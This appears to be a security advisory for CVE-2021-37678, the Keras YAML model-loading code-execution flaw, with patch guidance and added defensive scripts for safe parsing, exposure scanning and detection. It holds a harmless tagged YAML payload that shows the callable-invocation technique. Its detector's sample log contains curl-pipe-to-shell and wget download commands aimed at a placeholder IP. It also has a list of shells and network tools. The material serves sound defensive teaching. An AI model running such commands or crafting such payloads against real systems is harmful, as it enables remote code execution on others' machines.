CVE-2021-37678
📋 TL;DR
Keras's YAML model-loading path (tf.keras.models.model_from_yaml(), the counterpart of Model.to_yaml()) parsed its input with PyYAML's yaml.unsafe_load, which instantiates whatever Python objects the document's tags name. A crafted YAML model file therefore runs attacker-supplied code with the privileges of the process that loads it. Anyone who loads Keras model architectures from YAML on an unpatched TensorFlow release is affected.
💻 Affected Systems
- TensorFlow
- Keras
📦 What is this software?
TensorFlow is Google's open-source machine learning framework. Keras is its high-level model-building API (shipped as tf.keras), which included the to_yaml() / model_from_yaml() helpers for serialising a model's architecture to YAML and back.
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining remote code execution, potentially leading to data theft, ransomware deployment, or lateral movement within the network.
Likely Case
Remote code execution inside ML pipelines or model-serving services that accept model files from outside: the attacker's code runs with the permissions of the Python process that called model_from_yaml(), which is usually enough to read the host's data and credentials and pivot from there. This is not a privilege-escalation bug; it grants no more than the loading process already has.
If Mitigated
Limited impact if YAML model files come only from trusted, integrity-checked sources (or YAML loading is not used at all) and the ML hosts are network-segmented.
🎯 Exploit Status
Exploitation requires the victim to load an attacker-controlled YAML file through model_from_yaml(); nothing else is needed. A public proof-of-concept (a YAML document whose tags make PyYAML call Python callables) demonstrates command execution on load.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: TensorFlow 2.6.0, 2.5.1, 2.4.3, 2.3.4
Vendor Advisory: https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
Restart Required: No reboot, but any long-running Python process (model server, notebook kernel, scheduler worker) that already imported TensorFlow keeps the old module loaded until it is restarted.
Instructions:
1. Upgrade to the patched release for the branch you run: pip install --upgrade "tensorflow==2.6.0" (or 2.5.1, 2.4.3, 2.3.4).
2. Migrate away from YAML: the fix does not harden the loader, it removes it. In patched releases Model.to_yaml() and tf.keras.models.model_from_yaml() raise RuntimeError and point to Model.to_json() / tf.keras.models.model_from_json(), so convert stored YAML architectures to JSON (or to a saved model) before rolling the upgrade out.
3. Re-run the ML pipelines and their test suites after the upgrade to catch any remaining YAML call sites.
🔧 Temporary Workarounds
Disable YAML model loading
Remove or disable every call to tf.keras.models.model_from_yaml() (and the Model.to_yaml() calls that produce its input) and switch those code paths to Model.to_json() / model_from_json(), which go through the JSON parser and cannot instantiate Python objects.
# Find Keras YAML (de)serialisation and direct PyYAML loaders in the code base
grep -rnE 'model_from_yaml|to_yaml|yaml\.(unsafe_)?load|UnsafeLoader' /path/to/code/
# Replace model_from_yaml()/to_yaml() with model_from_json()/to_json()
Use safe YAML loader
If your own code parses YAML, use yaml.safe_load (or yaml.load with Loader=yaml.SafeLoader), which builds only plain data and raises on every !!python/* tag. This does not fix CVE-2021-37678 itself: the unsafe_load call sits inside TensorFlow's Keras package, so only the upgrade, or removing the model_from_yaml() calls, closes it.
# In custom Python code:
import yaml
# Before (unsafe: a tag such as !!python/object/apply can name any Python callable):
#   data = yaml.unsafe_load(fh)
# After (safe: only plain dicts, lists and scalars are constructed):
with open("config.yaml") as fh:
    data = yaml.safe_load(fh)
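The following is an added example, not code from TensorFlow or from this advisory: a SafeLoader-based replacement for parsing a Keras architecture YAML, for teams that still hold files written by the old to_yaml() and want to convert them to JSON without ever calling unsafe_load. It assumes PyYAML is installed. The model config and the tagged payload are constructed samples; the payload names os.getcwd so that running the comparison is harmless, where an attacker would name something like os.system.

```python
"""Added example: parse a Keras model-architecture YAML without yaml.unsafe_load."""
import json

import yaml  # PyYAML, the library whose unsafe_load() is behind CVE-2021-37678


class KerasConfigLoader(yaml.SafeLoader):
    """SafeLoader plus one extra tag.

    SafeLoader builds only plain data (dicts, lists, scalars) and raises
    ConstructorError on every !!python/* tag, which is what blocks the exploit.
    Old Model.to_yaml() output contains one such tag, !!python/tuple (kernel_size,
    batch_input_shape, ...), so that single tag is allowed back in as a data-only
    constructor. Nothing registered here can reach a Python callable.
    """


def _construct_tuple(loader: yaml.SafeLoader, node: yaml.Node) -> tuple:
    return tuple(loader.construct_sequence(node, deep=True))


KerasConfigLoader.add_constructor("tag:yaml.org,2002:python/tuple", _construct_tuple)


def load_keras_config(yaml_text: str) -> dict:
    """Return the model config as a plain dict, or raise if the document is not one."""
    config = yaml.load(yaml_text, Loader=KerasConfigLoader)
    if not isinstance(config, dict) or "class_name" not in config:
        raise ValueError("document is not a Keras model config")
    return config


def to_model_json(yaml_text: str) -> str:
    """JSON string suitable for tf.keras.models.model_from_json(); tuples become lists."""
    return json.dumps(load_keras_config(yaml_text))


def rejects(yaml_text: str) -> bool:
    """True when the hardened loader refuses the document because of a forbidden tag."""
    try:
        load_keras_config(yaml_text)
    except yaml.constructor.ConstructorError:
        return True
    return False


def unsafe_load_result(yaml_text: str):
    """What the vulnerable code path did: yaml.unsafe_load honours every Python tag."""
    return yaml.unsafe_load(yaml_text)


# Constructed sample: the shape of a Sequential config as pre-2.6 to_yaml() wrote it.
BENIGN_YAML = """\
class_name: Sequential
config:
  name: tiny
  layers:
  - class_name: Conv2D
    config:
      name: conv
      filters: 8
      kernel_size: !!python/tuple [3, 3]
      batch_input_shape: !!python/tuple [null, 28, 28, 1]
keras_version: 2.4.0
backend: tensorflow
"""

# Constructed payload using the PyYAML feature the advisory describes: a tag that makes
# the loader call a Python callable. os.getcwd has no side effects, so this is safe to run.
TAGGED_PAYLOAD = "class_name: !!python/object/apply:os.getcwd []\nconfig: {}\n"

if __name__ == "__main__":
    print("unsafe_load called a function:", unsafe_load_result(TAGGED_PAYLOAD)["class_name"])
    print("hardened loader rejects it:", rejects(TAGGED_PAYLOAD))
    layer = load_keras_config(BENIGN_YAML)["config"]["layers"][0]["config"]
    print("benign config kernel_size:", layer["kernel_size"])
```

Feed the output of to_model_json() to tf.keras.models.model_from_json() on the patched release; the conversion itself never touches TensorFlow, so it can run in a locked-down job before the upgrade.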
🧯 If You Can't Patch
- Restrict YAML file uploads to trusted sources only
- Implement strict input validation and sandboxing for ML model processing pipelines
🔍 How to Verify
Check if Vulnerable:
You are exposed if the installed TensorFlow is older than the patched release for its branch (2.3.4, 2.4.3, 2.5.1, 2.6.0) and your code, or a library you depend on, calls tf.keras.models.model_from_yaml() on files you do not fully control. Print the version with the command below and search the code base for model_from_yaml() / to_yaml() call sites.
Check Version:
python -c "import tensorflow as tf; print('TensorFlow version:', tf.__version__)"
Verify Fix Applied:
After patching, confirm the reported version is 2.6.0 or later, or at least 2.5.1 / 2.4.3 / 2.3.4 on the respective branch, and that tf.keras.models.model_from_yaml() now raises RuntimeError instead of parsing input (the patched releases remove YAML support rather than harden it).
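An added example (not part of this page or of the TensorFlow project) that turns the grep from the workaround section and the version check here into one script: a version test against the patched-release table, plus an ast-based scan for model_from_yaml() / to_yaml() and for PyYAML loads not pinned to SafeLoader, which a text grep cannot tell apart from safe ones. It uses only the standard library. SAMPLE_SOURCE is a constructed file, and the spelling `import yaml` for PyYAML is an assumption of the scanner.

```python
"""Added example: assess CVE-2021-37678 exposure from the installed version and the code base."""
import ast
import pathlib
import re
from typing import List, Tuple

# Patched releases from GHSA-r6jx-9g48-2r5r. Branches 2.0-2.2 never received the fix;
# 2.6.0 and later remove YAML model loading altogether.
PATCHED_MINIMUMS = {3: (2, 3, 4), 4: (2, 4, 3), 5: (2, 5, 1)}
FIRST_SAFE_RELEASE = (2, 6, 0)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(.*)$")
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader"}


def is_vulnerable_version(version: str) -> bool:
    """True when this tf.__version__ still ships the unsafe_load-based model_from_yaml()."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised TensorFlow version: {version!r}")
    triple = tuple(int(m.group(i)) for i in (1, 2, 3))
    boundary = PATCHED_MINIMUMS.get(triple[1]) if triple[0] == 2 else None
    if m.group(4) and triple in (FIRST_SAFE_RELEASE, boundary):
        return True  # e.g. 2.6.0-rc0: a pre-release of the fix version may predate the commit
    if triple >= FIRST_SAFE_RELEASE:
        return False
    if boundary is not None:
        return triple < boundary
    return True  # 1.x and 2.0-2.2: no patched release exists


def _dotted(node: ast.AST) -> str:
    """'yaml.unsafe_load' for an attribute chain, 'model_from_yaml' for a bare name, else ''."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def find_unsafe_yaml_calls(source: str, filename: str = "<string>") -> List[Tuple[int, str, str]]:
    """Return (line, call, reason) for each call that reaches an unsafe YAML loader.

    Covers the Keras helpers and direct PyYAML use not pinned to SafeLoader. Assumes
    PyYAML is imported as `yaml`; `from yaml import load` style imports are not tracked.
    """
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        call = _dotted(node.func)
        leaf = call.rsplit(".", 1)[-1]
        if leaf in ("model_from_yaml", "to_yaml"):
            findings.append((node.lineno, call, "Keras YAML helper: unsafe_load before the fix, RuntimeError after it"))
        elif leaf in ("unsafe_load", "unsafe_load_all"):
            findings.append((node.lineno, call, "PyYAML unsafe loader"))
        elif leaf in ("load", "load_all") and call.startswith("yaml."):
            loader = node.args[1] if len(node.args) > 1 else None
            for kw in node.keywords:
                if kw.arg == "Loader":
                    loader = kw.value
            if loader is None:
                findings.append((node.lineno, call, "no Loader given: PyYAML < 5.1 defaults to the unsafe Loader"))
            elif _dotted(loader).rsplit(".", 1)[-1] not in SAFE_LOADERS:
                findings.append((node.lineno, call, f"Loader={_dotted(loader)} is not SafeLoader"))
    return sorted(findings)


def audit_tree(root: str) -> List[Tuple[str, int, str, str]]:
    """Run find_unsafe_yaml_calls over every .py file under root, skipping files that do not parse."""
    results = []
    for path in sorted(pathlib.Path(root).rglob("*.py")):
        try:
            hits = find_unsafe_yaml_calls(path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError:
            continue
        results.extend((str(path), line, call, why) for line, call, why in hits)
    return results


# Constructed sample source: two vulnerable call sites (lines 6 and 10) and one safe one.
SAMPLE_SOURCE = """\
import yaml
from tensorflow.keras import models

def load_arch(path):
    with open(path) as fh:
        return models.model_from_yaml(fh.read())

def load_cfg(path):
    with open(path) as fh:
        return yaml.load(fh, Loader=yaml.UnsafeLoader)

def load_cfg_safely(path):
    with open(path) as fh:
        return yaml.safe_load(fh)
"""

if __name__ == "__main__":
    import sys
    try:
        import tensorflow as tf
        print(f"TensorFlow {tf.__version__}: vulnerable={is_vulnerable_version(tf.__version__)}")
    except ImportError:
        print("TensorFlow not importable here; scanning code only")
    for path, line, call, why in audit_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{line}: {call}() - {why}")
```

Run it on the host that serves the models, since tf.__version__ there is what matters, and point it at the application tree (not site-packages) so the findings are call sites you can actually change.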
📡 Detection & Monitoring
Log Indicators:
- Shells, download tools or other interpreters spawned as children of the Python processes that serve or train models (the payload executes inside that process, so its first visible act is usually a child process)
- Errors related to YAML parsing or model loading failures
- Large or malformed YAML file uploads to ML endpoints
Network Indicators:
- Unexpected outbound connections from ML servers after YAML file processing
- HTTP requests with YAML payloads to model loading endpoints
SIEM Query (pseudo-syntax; adapt to your platform's field names):
source="*tensorflow*" AND ("yaml" OR "model_from_yaml") AND (process_execution OR error)
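As an added example (not from this page or any vendor), the first process indicator above written as a check over process-creation events: a Python interpreter or WSGI server that spawns a shell or download tool, raised to high severity when the parent's command line shows it was handling TensorFlow/Keras or YAML input. The JSON field names and the log lines are constructed for the example; map them onto your EDR's schema.

```python
"""Added example: flag shells or network tools spawned by Python ML processes."""
import json
import os
from typing import Dict, List

# Interpreters and servers under which a Keras model gets loaded. A child shell or
# download tool under one of these is the execution footprint a YAML payload leaves.
MODEL_LOADERS = {"python", "python3", "python3.8", "python3.9", "python3.10", "gunicorn", "uvicorn"}
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat", "perl"}
# Substrings in the parent's command line that tie the event to model loading.
ML_HINTS = ("tensorflow", "keras", "model_from_yaml", ".yaml", ".yml")


def flag_events(log_lines: List[str]) -> List[Dict[str, str]]:
    """One alert per event where a model-loading interpreter spawns a shell or network tool.

    Input: one JSON object per line with the constructed, EDR-style fields
    ts, host, pid, parent_image, parent_cmdline, image, cmdline.
    """
    alerts = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        parent = os.path.basename(ev.get("parent_image", ""))
        child = os.path.basename(ev.get("image", ""))
        if parent not in MODEL_LOADERS or child not in SUSPICIOUS_CHILDREN:
            continue
        parent_cmd = ev.get("parent_cmdline", "").lower()
        severity = "high" if any(h in parent_cmd for h in ML_HINTS) else "medium"
        alerts.append({
            "ts": ev["ts"], "host": ev["host"], "pid": str(ev["pid"]),
            "parent": parent, "child": child, "cmdline": ev.get("cmdline", ""),
            "severity": severity,
        })
    return alerts


# Constructed sample: one hit tied to a YAML model load, one worker spawn (benign),
# one cron shell (wrong parent), one download from a training job (medium).
SAMPLE_LOG = """\
{"ts": "2021-08-13T10:02:11Z", "host": "ml-serve-01", "pid": 4102, "parent_image": "/usr/bin/python3.9", "parent_cmdline": "python3.9 serve.py --arch models/upload_7.yaml", "image": "/bin/sh", "cmdline": "sh -c curl http://192.0.2.10/s | sh"}
{"ts": "2021-08-13T10:02:12Z", "host": "ml-serve-01", "pid": 4103, "parent_image": "/usr/bin/python3.9", "parent_cmdline": "python3.9 serve.py --arch models/upload_7.yaml", "image": "/usr/bin/python3.9", "cmdline": "python3.9 -c from multiprocessing.spawn import spawn_main"}
{"ts": "2021-08-13T10:02:13Z", "host": "ml-serve-01", "pid": 4104, "parent_image": "/usr/sbin/cron", "parent_cmdline": "/usr/sbin/cron -f", "image": "/bin/sh", "cmdline": "sh -c /usr/local/bin/rotate-logs"}
{"ts": "2021-08-13T10:02:14Z", "host": "ml-train-02", "pid": 918, "parent_image": "/usr/bin/python3", "parent_cmdline": "python3 train.py", "image": "/usr/bin/wget", "cmdline": "wget -q http://192.0.2.10/p -O /tmp/.p"}
"""

if __name__ == "__main__":
    for alert in flag_events(SAMPLE_LOG.splitlines()):
        print(f"[{alert['severity']}] {alert['ts']} {alert['host']} {alert['parent']} -> {alert['child']}: {alert['cmdline']}")
```

Tune MODEL_LOADERS to the interpreters actually deployed (a venv's python3.9 shows up under its own path, which basename handles) and expect legitimate medium-severity noise from training jobs that shell out on purpose; the high-severity rule is the one worth paging on.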
🔗 References
- https://github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r